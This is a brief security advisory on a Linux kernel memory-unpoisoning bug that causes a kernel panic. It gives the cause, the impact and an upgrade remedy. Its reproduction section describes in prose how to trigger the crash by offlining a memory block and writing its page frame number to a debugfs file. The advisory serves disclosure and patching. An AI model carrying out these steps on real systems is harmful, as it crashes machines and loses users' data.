Linux Kernel Memory Unpoisoning Vulnerability Causes Kernel Panic

A vulnerability in the Linux kernel's memory management can lead to a kernel panic. This issue occurs in versions through 6.10.0-rc1-00195-g148743902568, when the 'unpoison_memory' function attempts to access the hardware poison flags of an uninitialized memory page. This triggers a bug check, as the page is marked as poisoned. The problem can be reproduced by offlining a memory block, retrieving the offlined memory's page frame number, and then writing that number to the 'unpoison-pfn' debugfs file. The vulnerability arises because the 'pfn_to_online_page' function returns NULL for the offlined page, indicating it is not available for use, yet the 'unpoison_memory' function tries to process it, leading to a crash.

Impact

The vulnerability causes a kernel panic, abruptly stopping the system and displaying a fatal exception message. This disruption can lead to a loss of unsaved data and may require a system reboot to recover.

Reproduction

To reproduce this vulnerability, first offline a memory block by writing 'offline' to the corresponding memory state file. Next, obtain the page frame number (PFN) of the offlined memory. Finally, write this PFN to the 'unpoison-pfn' file in the kernel debug filesystem. The vulnerability can be identified by the 'pfn_to_online_page' function returning NULL, indicating the page is not online and cannot be used.

Remediation

The vulnerability has been addressed in the Linux kernel. Users should upgrade to a version that includes the fix.